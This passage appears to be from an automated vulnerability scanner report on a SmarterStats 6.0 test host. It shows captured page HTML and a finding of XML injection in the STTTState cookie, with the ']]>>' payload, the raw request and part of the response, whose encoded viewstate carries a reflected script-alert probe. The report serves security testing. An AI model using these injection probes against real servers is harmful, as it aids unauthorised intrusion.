           <td class="rcWeekend" title="Sunday, October 03, 2010"><a href="#">3</a></td><td title="Monday, October 04, 2010"><a href="#">4</a></td><td title="Tuesday, October 05, 2010"><a href="#">5</a></td><td title="Wednesday, October 06, 2010"><a href="#">6</a></td><td title="Thursday, October 07, 2010"><a href="#">7</a></td><td title="Friday, October 08, 2010"><a href="#">8</a></td><td class="rcWeekend" title="Saturday, October 09, 2010"><a href="#">9</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 10, 2010"><a href="#">10</a></td><td title="Monday, October 11, 2010"><a href="#">11</a></td><td title="Tuesday, October 12, 2010"><a href="#">12</a></td><td title="Wednesday, October 13, 2010"><a href="#">13</a></td><td title="Thursday, October 14, 2010"><a href="#">14</a></td><td title="Friday, October 15, 2010"><a href="#">15</a></td><td class="rcWeekend" title="Saturday, October 16, 2010"><a href="#">16</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 17, 2010"><a href="#">17</a></td><td title="Monday, October 18, 2010"><a href="#">18</a></td><td title="Tuesday, October 19, 2010"><a href="#">19</a></td><td title="Wednesday, October 20, 2010"><a href="#">20</a></td><td title="Thursday, October 21, 2010"><a href="#">21</a></td><td title="Friday, October 22, 2010"><a href="#">22</a></td><td class="rcWeekend" title="Saturday, October 23, 2010"><a href="#">23</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 24, 2010"><a href="#">24</a></td><td title="Monday, October 25, 2010"><a href="#">25</a></td><td title="Tuesday, October 26, 2010"><a href="#">26</a></td><td title="Wednesday, October 27, 2010"><a href="#">27</a></td><td title="Thursday, October 28, 2010"><a href="#">28</a></td><td title="Friday, October 29, 2010"><a href="#">29</a></td><td class="rcWeekend" title="Saturday, October 30, 2010"><a href="#">30</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 31, 2010"><a href="#">31</a></td><td class="rcOtherMonth" title="Monday, November 01, 2010"><a href="#">1</a></td><td class="rcOtherMonth" title="Tuesday, November 02, 2010"><a href="#">2</a></td><td class="rcOtherMonth" title="Wednesday, November 03, 2010"><a href="#">3</a></td><td class="rcOtherMonth" title="Thursday, November 04, 2010"><a href="#">4</a></td><td class="rcOtherMonth" title="Friday, November 05, 2010"><a href="#">5</a></td><td class="rcOtherMonth" title="Saturday, November 06, 2010"><a href="#">6</a></td>
       </tr>
   </tbody>
</table></td>
   </tr>
</tbody>
           </table><input type="hidden" name="ctl00_MPH_RadStartDate_calendar_SD" id="ctl00_MPH_RadStartDate_calendar_SD" value="[]" /><input type="hidden" name="ctl00_MPH_RadStartDate_calendar_AD" id="ctl00_MPH_RadStartDate_calendar_AD" value="[[1800,1,1],[2200,1,1],[2010,10,11]]" /></div></td>
       </tr>
   </table><input id="ctl00_MPH_RadStartDate_ClientState" name="ctl00_MPH_RadStartDate_ClientState" type="hidden" />
</div>
                       </td>
                       <td class='PaddedText'>
                           to
                       </td>
                       <td>
                           <div id="ctl00_MPH_RadEndDate_wrapper" class="RadPicker RadPicker_SmarterTools DatePickerOverride" style="display:inline-block;width:150px;">
   <input style="visibility:hidden;display:block;float:right;margin:0 0 -1px -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_RadEndDate" name="ctl00$MPH$RadEndDate" type="text" class="rdfd_" value="2010-10-11" /><table cellspacing="0" class="rcTable" style="width:100%;">
       <tr>
           <td class="rcInputCell" style="width:100%;"><span id="ctl00_MPH_RadEndDate_dateInput_wrapper" class="RadInput RadInput_SmarterTools" style="display:block;white-space:normal;"><input type="text" value="10/11/2010" id="ctl00_MPH_RadEndDate_dateInput_text" name="ctl00_MPH_RadEndDate_dateInput_text" class="riTextBox riEnabled" style="width:100%;" /><input style="visibility:hidden;float:right;margin:-18px 0 0 -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_RadEndDate_dateInput" name="ctl00$MPH$RadEndDate$dateInput" type="text" class="rdfd_" value="2010-10-11-00-00-00" /><input id="ctl00_MPH_RadEndDate_dateInput_ClientState" name="ctl00_MPH_RadEndDate_dateInput_ClientState" type="hidden" /></span></td><td><a title="Open the calendar popup." href="#" id="ctl00_MPH_RadEndDate_popupButton" onclick="return CalendarPopup($find(&#39;ctl00_MPH_RadEndDate&#39;),&#39;cal&#39;);"><img id="ctl00_MPH_RadEndDate_CalendarPopupButton" src="/App_Themes/Default/Images/16x16/CalendarMonth.gif" alt="Open the calendar popup." style="border-width:0px;" /></a><div id="ctl00_MPH_RadEndDate_calendar_wrapper" style="display: none" ><table id="ctl00_MPH_RadEndDate_calendar" summary="Calendar" cellspacing="0" class="RadCalendar RadCalendar_SmarterTools" border="0">
               <thead>
                   <tr>
                       <td class="rcTitlebar"><table cellspacing="0" summary="title and navigation" border="0">
                           <tr>
                               <td><a id="ctl00_MPH_RadEndDate_calendar_FNP" class="rcFastPrev" title="&lt;&lt;" href="#"></a></td><td><a id="ctl00_MPH_RadEndDate_calendar_NP" class="rcPrev" title="&lt;" href="#"></a></td><td id="ctl00_MPH_RadEndDate_calendar_Title" class="rcTitle">October 2010</td><td><a id="ctl00_MPH_RadEndDate_calendar_NN" class="rcNext" title=">" href="#"></a></td><td><a id="ctl00_MPH_RadEndDate_calendar_FNN" class="rcFastNext" title=">>" href="#"></a></td>
                           </tr>
                       </table></td>
                   </tr>
               </thead><tbody>
   <tr>
       <td class="rcMain"><table id="ctl00_MPH_RadEndDate_calendar_Top" class="rcMainTable" cellspacing="0" summary="October 2010" border="0">
   <thead>
       <tr class="rcWeek">
           <th id="ctl00_MPH_RadEndDate_calendar_Top_cs_0" title="Sunday" abbr="Sun" scope="col">S</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_1" title="Monday" abbr="Mon" scope="col">M</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_2" title="Tuesday" abbr="Tue" scope="col">T</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_3" title="Wednesday" abbr="Wed" scope="col">W</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_4" title="Thursday" abbr="Thu" scope="col">T</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_5" title="Friday" abbr="Fri" scope="col">F</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_6" title="Saturday" abbr="Sat" scope="col">S</th>
       </tr>
   </thead><tbody>
       <tr class="rcRow">
           <td class="rcOtherMonth" title="Sunday, September 26, 2010"><a href="#">26</a></td><td class="rcOtherMonth" title="Monday, September 27, 2010"><a href="#">27</a></td><td class="rcOtherMonth" title="Tuesday, September 28, 2010"><a href="#">28</a></td><td class="rcOtherMonth" title="Wednesday, September 29, 2010"><a href="#">29</a></td><td class="rcOtherMonth" title="Thursday, September 30, 2010"><a href="#">30</a></td><td title="Friday, October 01, 2010"><a href="#">1</a></td><td class="rcWeekend" title="Saturday, October 02, 2010"><a href="#">2</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 03, 2010"><a href="#">3</a></td><td title="Monday, October 04, 2010"><a href="#">4</a></td><td title="Tuesday, October 05, 2010"><a href="#">5</a></td><td title="Wednesday, October 06, 2010"><a href="#">6</a></td><td title="Thursday, October 07, 2010"><a href="#">7</a></td><td title="Friday, October 08, 2010"><a href="#">8</a></td><td class="rcWeekend" title="Saturday, October 09, 2010"><a href="#">9</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 10, 2010"><a href="#">10</a></td><td title="Monday, October 11, 2010"><a href="#">11</a></td><td title="Tuesday, October 12, 2010"><a href="#">12</a></td><td title="Wednesday, October 13, 2010"><a href="#">13</a></td><td title="Thursday, October 14, 2010"><a href="#">14</a></td><td title="Friday, October 15, 2010"><a href="#">15</a></td><td class="rcWeekend" title="Saturday, October 16, 2010"><a href="#">16</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 17, 2010"><a href="#">17</a></td><td title="Monday, October 18, 2010"><a href="#">18</a></td><td title="Tuesday, October 19, 2010"><a href="#">19</a></td><td title="Wednesday, October 20, 2010"><a href="#">20</a></td><td title="Thursday, October 21, 2010"><a href="#">21</a></td><td title="Friday, October 22, 2010"><a href="#">22</a></td><td class="rcWeekend" title="Saturday, October 23, 2010"><a href="#">23</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 24, 2010"><a href="#">24</a></td><td title="Monday, October 25, 2010"><a href="#">25</a></td><td title="Tuesday, October 26, 2010"><a href="#">26</a></td><td title="Wednesday, October 27, 2010"><a href="#">27</a></td><td title="Thursday, October 28, 2010"><a href="#">28</a></td><td title="Friday, October 29, 2010"><a href="#">29</a></td><td class="rcWeekend" title="Saturday, October 30, 2010"><a href="#">30</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 31, 2010"><a href="#">31</a></td><td class="rcOtherMonth" title="Monday, November 01, 2010"><a href="#">1</a></td><td class="rcOtherMonth" title="Tuesday, November 02, 2010"><a href="#">2</a></td><td class="rcOtherMonth" title="Wednesday, November 03, 2010"><a href="#">3</a></td><td class="rcOtherMonth" title="Thursday, November 04, 2010"><a href="#">4</a></td><td class="rcOtherMonth" title="Friday, November 05, 2010"><a href="#">5</a></td><td class="rcOtherMonth" title="Saturday, November 06, 2010"><a href="#">6</a></td>
       </tr>
   </tbody>
</table></td>
   </tr>
</tbody>
           </table><input type="hidden" name="ctl00_MPH_RadEndDate_calendar_SD" id="ctl00_MPH_RadEndDate_calendar_SD" value="[]" /><input type="hidden" name="ctl00_MPH_RadEndDate_calendar_AD" id="ctl00_MPH_RadEndDate_calendar_AD" value="[[1800,1,1],[2200,1,1],[2010,10,11]]" /></div></td>
       </tr>
   </table><input id="ctl00_MPH_RadEndDate_ClientState" name="ctl00_MPH_RadEndDate_ClientState" type="hidden" />
</div>
                       </td>
                   </tr>
               </table>
           </div>
           <div>
               <table cellspacing='0' class='ReportOptionSection'>
                   <tr>
                       
                       
                       
                       
                       
                       
                       
                       
                       
                       
                       
                       
                       <td class='GenerateReportButton'>
                           <div id="ctl00_MPH_btnGenerateReport" class="BBButton RefreshButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$MPH$btnGenerateReport',''); return false;"><span class="BBInner"></span></a></div>
                       </td>
                   </tr>
               </table>
           </div>
       </div>
       <div class='ReportOptionSection' style='display: none'>
           <div id="ctl00_MPH_UpdatePanel1">
   
                   <table cellspacing='0' class='ReportOptionSection'>
                       <tr>
                           <td class='ReportTitle'>
                               <span id="ctl00_MPH_lblReportTitle"></span>
                           </td>
                           <td class='ReportSubTitle'>
                               (<span id="ctl00_MPH_lblReportSubTitle"></span>)
                           </td>
                       </tr>
                   </table>
               
</div>
       </div>
   </div>
   <input type="hidden" name="ctl00$MPH$hfDMFilename" id="ctl00_MPH_hfDMFilename" />
   <input type="hidden" name="ctl00$MPH$hfDMReport" id="ctl00_MPH_hfDMReport" />
   <div id="ctl00_MPH_UP1">
   
           
           <a id="ctl00_MPH_lnkCancel" href="javascript:__doPostBack(&#39;ctl00$MPH$lnkCancel&#39;,&#39;&#39;)"></a>
       
</div>
   <input type="submit" name="ctl00$MPH$btnShowReport" value="Display Report" id="ctl00_MPH_btnShowReport" style="display: none" />

       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
   Logs imported from 1/1/0001 to 12/31/9999

           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('client/frmviewreports', 'Standard\x5fWebmaster');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       
   <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=Specific/ProgressBar"></script>

   <script type="text/javascript">
       var loaded = false;
       function DoDataMine(file, report) {
           //location.href = '/Client/frmViewReports.aspx?reporttype=interactive&file=' + file + '&mine=' + report;
           parent.dmFilename = file;
           parent.dmQuery = report;
           parent.UpdateSection('UserDataMining', null, false, false); //filename
       }
       function AddFavoritePopup() {
           var url = "/Client/Popups/frmFavoriteReport.aspx";
           SpawnHyperWindow(url, 375, 320, null);
       }
       function AddFavoritePopup_Interactive() {
           var url = "/Client/Popups/frmFavoriteReport.aspx";
           SpawnHyperWindow(url, 500, 270, null);
       }
       function AddFavoritePopup_SEO() {
           var url = "/Client/Popups/frmFavoriteReport.aspx";
           SpawnHyperWindow(url, 375, 230, null);
       }
       function ExportReportPopup() {
           var url = "/Client/Popups/frmExportReport.aspx";
           window.name = "GenericWindow";
           SpawnHyperWindow(url, 400, 100, null);
       }
       function EmailReportPopup() {
           if (false)
           {
            var url = "/Client/Popups/frmEmailReport.aspx";
            window.name = "GenericWindow";
            SpawnHyperWindow(url, 450, 340, null);
           }
           else
           {
            ShowAlertWindow("In order to send reports through email, SMTP information must be entered into the Email Settings page by a site administrator.");
           }
       }
       function PrintReportPopup() {
           var url = "/Client/Popups/frmPrintPreview.aspx";
           parent.GenericPopup(url, "PrintPreview", "width=700,height=500,resizable=yes,scrollbars=yes,status=no");
       }
       function RadDataMine(filename, miningset, report) {
        SpawnHyperWindowWithElement(
        "/Client/Popups/frmDataMine.aspx?file=" + filename + "&miningset=" + miningset + "&report=" + report,
        400, 130, null, DoDataMine);
       }

       function GetProgressUpdate() {
           PageMethods.GetReportProgress(progressGuid, ProgressBarCallbackComplete, ProgressBarCallbackFailed);
       }
       function DoReportPostBack() {
           //
__doPostBack('ctl00$MPH$btnShowReport','');
       }
       function DoReportCancel() {
           //
__doPostBack('ctl00$MPH$lnkCancel','');;
       }
       function SiteUrlUndefined()
       {
           parent.ShowAlertWindow('The Site URL for this site has not been set. In order to view pages, define this value in the site general settings.');
       }
       var ProgressBarText = 'Processing';

   </script>


   

<script type="text/javascript">
//<![CDATA[
$(function() { if (parent.UpdateCurrentPage) parent.UpdateCurrentPage('\x2fClient\x2ffrmViewReports\x2easpx?Custom\x3dFalse\x26ReportType\x3dStandard\x26subReportName\x3dWebmaster'); });
$(function() { SetTopTitle('View\x20Report'); });
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDateInput, {"_focused":false,"_originalValue":"10/5/2010 12:00:00 AM","_postBackEventReferenceScript":"__doPostBack(\u0027ctl00$MPH$RadStartDate\u0027,\u0027\u0027)","_skin":"SmarterTools","clientStateFieldID":"ctl00_MPH_RadStartDate_dateInput_ClientState","dateFormat":"M/d/yyyy","dateFormatInfo":{"DayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"MonthNames":["January","February","March","April","May","June","July","August","September","October","November","December",""],"AbbreviatedDayNames":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"AbbreviatedMonthNames":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"AMDesignator":"AM","PMDesignator":"PM","DateSeparator":"/","TimeSeparator":":","FirstDayOfWeek":0,"DateSlots":{"Month":0,"Year":2,"Day":1},"ShortYearCenturyEnd":2029,"TimeInputOnly":false},"displayDateFormat":"M/d/yyyy","enabled":true,"incrementSettings":{InterceptArrowKeys:true,InterceptMouseWheel:true,Step:1},"maxDate":"2200-01-01-00-00-00","minDate":"1800-01-01-00-00-00","styles":{HoveredStyle: ["width:100%;", "riTextBox riHover"],InvalidStyle: ["width:100%;", "riTextBox riError"],DisabledStyle: ["width:100%;", "riTextBox riDisabled"],FocusedStyle: ["width:100%;", "riTextBox riFocused"],EmptyMessageStyle: ["width:100%;", "riTextBox riEmpty"],ReadOnlyStyle: ["width:100%;", "riTextBox riRead"],EnabledStyle: ["width:100%;", "riTextBox riEnabled"]}}, null, null, $get("ctl00_MPH_RadStartDate_dateInput"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadCalendar, {"_DayRenderChangedDays":{},"_FormatInfoArray":[["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],["January","February","March","April","May","June","July","August","September","October","November","December",""],["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"dddd, MMMM dd, yyyy h:mm:ss tt","dddd, MMMM dd, yyyy","h:mm:ss tt","MMMM dd","ddd, dd MMM yyyy HH\u0027:\u0027mm\u0027:\u0027ss \u0027GMT\u0027","M/d/yyyy","h:mm tt","yyyy\u0027-\u0027MM\u0027-\u0027dd\u0027T\u0027HH\u0027:\u0027mm\u0027:\u0027ss","yyyy\u0027-\u0027MM\u0027-\u0027dd HH\u0027:\u0027mm\u0027:\u0027ss\u0027Z\u0027","MMMM, yyyy","AM","PM","/",":",0],"_ViewRepeatableDays":{},"_ViewsHash":{"ctl00_MPH_RadStartDate_calendar_Top" : [[2010,10,1], 1]},"_calendarWeekRule":0,"_culture":"en-US","_enableKeyboardNavigation":false,"_enableViewSelector":false,"_firstDayOfWeek":7,"_postBackCall":"__doPostBack(\u0027ctl00$MPH$RadStartDate$calendar\u0027,\u0027@@\u0027)","clientStateFieldID":"ctl00_MPH_RadStartDate_calendar_ClientState","enableMultiSelect":false,"enabled":true,"monthYearNavigationSettings":["Today","OK","Cancel","Date is out of range.","False","True","300","1","300","1"],"skin":"SmarterTools","specialDaysArray":[],"stylesHash":{"DayStyle": ["", ""],"CalendarTableStyle": ["", "rcMainTable"],"OtherMonthDayStyle": ["", "rcOtherMonth"],"TitleStyle": ["", ""],"SelectedDayStyle": ["", "rcSelected"],"SelectorStyle": ["", ""],"DisabledDayStyle": ["", "rcDisabled"],"OutOfRangeDayStyle": ["", "rcOutOfRange"],"WeekendDayStyle": ["", "rcWeekend"],"DayOverStyle": ["", "rcHover"],"FastNavigationStyle": ["", "RadCalendarMonthView RadCalendarMonthView_SmarterTools"],"ViewSelectorStyle": ["", "rcViewSel"]},"useColumnHeadersAsSelectors":false,"useRowHeadersAsSelectors":false}, null, null, $get("ctl00_MPH_RadStartDate_calendar"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDatePicker, {"_PopupButtonSettings":{ ResolvedImageUrl : "/App_Themes/Default/Images/16x16/CalendarMonth.gif", ResolvedHoverImageUrl : "/App_Themes/Default/Images/16x16/CalendarMonth.gif"},"_animationSettings":{ShowAnimationDuration:300,ShowAnimationType:1,HideAnimationDuration:300,HideAnimationType:1},"_popupControlID":"ctl00_MPH_RadStartDate_popupButton","clientStateFieldID":"ctl00_MPH_RadStartDate_ClientState","focusedDate":"2010-10-11-00-00-00","maxDate":"2200-01-01-00-00-00","minDate":"1800-01-01-00-00-00"}, null, {"calendar":"ctl00_MPH_RadStartDate_calendar","dateInput":"ctl00_MPH_RadStartDate_dateInput"}, $get("ctl00_MPH_RadStartDate"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDateInput, {"_focused":false,"_originalValue":"10/11/2010 12:00:00 AM","_postBackEventReferenceScript":"__doPostBack(\u0027ctl00$MPH$RadEndDate\u0027,\u0027\u0027)","_skin":"SmarterTools","clientStateFieldID":"ctl00_MPH_RadEndDate_dateInput_ClientState","dateFormat":"M/d/yyyy","dateFormatInfo":{"DayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"MonthNames":["January","February","March","April","May","June","July","August","September","October","November","December",""],"AbbreviatedDayNames":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"AbbreviatedMonthNames":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"AMDesignator":"AM","PMDesignator":"PM","DateSeparator":"/","TimeSeparator":":","FirstDayOfWeek":0,"DateSlots":{"Month":0,"Year":2,"Day":1},"ShortYearCenturyEnd":2029,"TimeInputOnly":false},"displayDateFormat":"M/d/yyyy","enabled":true,"incrementSettings":{InterceptArrowKeys:true,InterceptMouseWheel:true,Step:1},"maxDate":"2200-01-01-00-00-00","minDate":"1800-01-01-00-00-00","styles":{HoveredStyle: ["width:100%;", "riTextBox riHover"],InvalidStyle: ["width:100%;", "riTextBox riError"],DisabledStyle: ["width:100%;", "riTextBox riDisabled"],FocusedStyle: ["width:100%;", "riTextBox riFocused"],EmptyMessageStyle: ["width:100%;", "riTextBox riEmpty"],ReadOnlyStyle: ["width:100%;", "riTextBox riRead"],EnabledStyle: ["width:100%;", "riTextBox riEnabled"]}}, null, null, $get("ctl00_MPH_RadEndDate_dateInput"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadCalendar, {"_DayRenderChangedDays":{},"_FormatInfoArray":[["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],["January","February","March","April","May","June","July","August","September","October","November","December",""],["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"dddd, MMMM dd, yyyy h:mm:ss tt","dddd, MMMM dd, yyyy","h:mm:ss tt","MMMM dd","ddd, dd MMM yyyy HH\u0027:\u0027mm\u0027:\u0027ss \u0027GMT\u0027","M/d/yyyy","h:mm tt","yyyy\u0027-\u0027MM\u0027-\u0027dd\u0027T\u0027HH\u0027:\u0027mm\u0027:\u0027ss","yyyy\u0027-\u0027MM\u0027-\u0027dd HH\u0027:\u0027mm\u0027:\u0027ss\u0027Z\u0027","MMMM, yyyy","AM","PM","/",":",0],"_ViewRepeatableDays":{},"_ViewsHash":{"ctl00_MPH_RadEndDate_calendar_Top" : [[2010,10,1], 1]},"_calendarWeekRule":0,"_culture":"en-US","_enableKeyboardNavigation":false,"_enableViewSelector":false,"_firstDayOfWeek":7,"_postBackCall":"__doPostBack(\u0027ctl00$MPH$RadEndDate$calendar\u0027,\u0027@@\u0027)","clientStateFieldID":"ctl00_MPH_RadEndDate_calendar_ClientState","enableMultiSelect":false,"enabled":true,"monthYearNavigationSettings":["Today","OK","Cancel","Date is out of range.","False","True","300","1","300","1"],"skin":"SmarterTools","specialDaysArray":[],"stylesHash":{"DayStyle": ["", ""],"CalendarTableStyle": ["", "rcMainTable"],"OtherMonthDayStyle": ["", "rcOtherMonth"],"TitleStyle": ["", ""],"SelectedDayStyle": ["", "rcSelected"],"SelectorStyle": ["", ""],"DisabledDayStyle": ["", "rcDisabled"],"OutOfRangeDayStyle": ["", "rcOutOfRange"],"WeekendDayStyle": ["", "rcWeekend"],"DayOverStyle": ["", "rcHover"],"FastNavigationStyle": ["", "RadCalendarMonthView RadCalendarMonthView_SmarterTools"],"ViewSelectorStyle": ["", "rcViewSel"]},"useColumnHeadersAsSelectors":false,"useRowHeadersAsSelectors":false}, null, null, $get("ctl00_MPH_RadEndDate_calendar"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDatePicker, {"_PopupButtonSettings":{ ResolvedImageUrl : "/App_Themes/Default/Images/16x16/CalendarMonth.gif", ResolvedHoverImageUrl : "/App_Themes/Default/Images/16x16/CalendarMonth.gif"},"_animationSettings":{ShowAnimationDuration:300,ShowAnimationType:1,HideAnimationDuration:300,HideAnimationType:1},"_popupControlID":"ctl00_MPH_RadEndDate_popupButton","clientStateFieldID":"ctl00_MPH_RadEndDate_ClientState","focusedDate":"2010-10-11-00-00-00","maxDate":"2200-01-01-00-00-00","minDate":"1800-01-01-00-00-00"}, null, {"calendar":"ctl00_MPH_RadEndDate_calendar","dateInput":"ctl00_MPH_RadEndDate_dateInput"}, $get("ctl00_MPH_RadEndDate"));
});
//]]>
</script>
</form>
</body>
</html>


3.11. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx [STTTState cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Client/frmViewReports.aspx

Issue detail

The STTTState cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the STTTState cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=Webmaster HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/default.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; loginsettings=rhBSoSZ3uKmx8z+qIBCGVhb6e6qOMott; STTTState=]]>>; STHashCookie={"CountsGuid":"1008079301","TopBarSection":"UserDemographics"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 01:03:06 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 44346



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   View Report - SmarterStats
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Reporting/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="" dir="ltr">
   <form name="aspnetForm" method="post" action="frmViewReports.aspx?Custom=False&amp;ReportType=Standard&amp;subReportName=Webmaster" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTIyNzU0MjE4NQ8WBB4QX19fUmVzdWx0RmFpbHVyZQWZBEltcG9ydCBFcnJvcjogMTAvMTEvMjAxMCA4OjAyIFBNIC0gRVJST1I6IENvdWxkIG5vdCBzYXZlIFNpdGVIaXN0b3J5IGZpbGUgQzpcJiN4MDAyMjsmI3gwMDJEOyYjeDAwMkQ7JiN4MDAzRTsmI3gwMDNDOyYjeDAwNzM7JiN4MDA2MzsmI3gwMDcyOyYjeDAwNjk7JiN4MDA3MDsmI3gwMDc0OyYjeDAwM0U7JiN4MDA2MTsmI3gwMDZDOyYjeDAwNjU7JiN4MDA3MjsmI3gwMDc0OyYjeDAwMjg7JiN4MDAzMDsmI3gwMDc4OyYjeDAwMzA7JiN4MDAzMDsmI3gwMDMwOyYjeDAwMzc7JiN4MDA0NjsmI3gwMDM3OyYjeDAwMjk7JiN4MDAzQzsmI3gwMDJGOyYjeDAwNzM7JiN4MDA2MzsmI3gwMDcyOyYjeDAwNjk7JiN4MDA3MDsmI3gwMDc0O1xXZWJMb2dzXDFcU2l0ZUNvbmZpZy54bWwubmV3My4gIEFzIGEgcHJlY2F1dGlvbiwgdGhpcyBzZXJ2ZXIgaGFzIGJlZW4gcGF1c2VkLiAgQSByZWJvb3QgbWF5IGJlIHRoZSBiZXN0IHdheSB0byBzb2x2ZSBhbnkgZmlsZSBsb2NraW5nIHByb2JsZW1zIHRoYXQgbWF5IGJlIHByZXNlbnQuPGJyPjxicj48YnI+PGJyPh4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYMAgMPZBYCAgEPZBYCAgEPZBYCZg9kFggCAQ8PFgIeB1Zpc2libGVoZGQCAw8PFgIeF0NsaWVudFNpZGVTY3JpcHRPbkNsaWNrBRJFbWFpbFJlcG9ydFBvcHVwKClkZAIFDw8WAh8DBRNFeHBvcnRSZXBvcnRQb3B1cCgpZGQCBw8PFgIfAwUSUHJpbnRSZXBvcnRQb3B1cCgpZGQCBA8WBB4Fc3R5bGUFDWRpc3BsYXk6bm9uZTsfAmhkAgYPFgIfAmhkAgcPZBYCZg9kFgICAQ9kFgICAQ8WAh4EVGV4dAW7BDxkaXYgY2xhc3M9IlRpcFRleHRGYWlsdXJlIj5JbXBvcnQgRXJyb3I6IDEwLzExLzIwMTAgODowMiBQTSAtIEVSUk9SOiBDb3VsZCBub3Qgc2F2ZSBTaXRlSGlzdG9yeSBmaWxlIEM6XCYjeDAwMjI7JiN4MDAyRDsmI3gwMDJEOyYjeDAwM0U7JiN4MDAzQzsmI3gwMDczOyYjeDAwNjM7JiN4MDA3MjsmI3gwMDY5